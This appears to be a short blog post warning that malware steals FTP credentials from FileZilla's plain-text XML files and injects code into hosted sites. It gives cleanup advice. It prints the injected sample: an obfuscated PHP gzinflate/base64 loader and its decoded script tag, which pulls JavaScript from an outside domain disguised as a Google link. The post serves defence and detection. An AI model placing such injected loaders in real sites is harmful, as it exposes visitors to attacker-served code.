Filezilla security hole hacking web sites
If you are using FileZilla as your FTP client, there is malware out there that will grab your FTP credentials from the Filezilla PLAIN TEXT FILE (yikes! ) and use that information to insert that malware code (indicated by the #b58b6f# type of code around a “gzinflate(base64_decode)” command. That is how your files will get attacked/compromised.
Look in your %APPDATA%/Roaming/Filezilla folder. One of the XML files in there has all your FTP web site credential (user/password/etc) in PLAIN TEXT! And the FileZilla people refuse to fix that obvious security hole.
My recommendation is :
– Change your FTP Password to your hosting
– Delete FileZilla from your computer (and you have to manually delete the folder in your APPDATA folder).
– Use another FTP secured client
Example of hacking sequence that you must clean your code from :
#c3284d#
echo(gzinflate(base64_decode(“JcwxDoAgDADAr5Du0sTR4FoUEUsZEq+ntG+4vrgjsih5mAwI3YKLveyvoMrhDMwi3CHWWvXV1GbSnjBml05PBYPVPPMYvWlBZbt9S9j3kCjFvMLQ418NLw==”)));
#/c3284d#
echo(gzinflate(base64_decode(“JcwxDoAgDADAr5Du0sTR4FoUEUsZEq+ntG+4vrgjsih5mAwI3YKLveyvoMrhDMwi3CHWWvXV1GbSnjBml05PBYPVPPMYvWlBZbt9S9j3kCjFvMLQ418NLw==”)));
#/c3284d#
is transcoded to this sequence :
<!–c3284d–><script type=”text/javascript” src=”http://www.v-w-b.de/includes/ga.php?id=2″ name=”googlelink”></script><!–/c3284d–>
<!–c3284d–><script type=”text/javascript” src=”http://www.v-w-b.de/includes/ga.php?id=2″ name=”googlelink”></script><!–/c3284d–>
Cheers
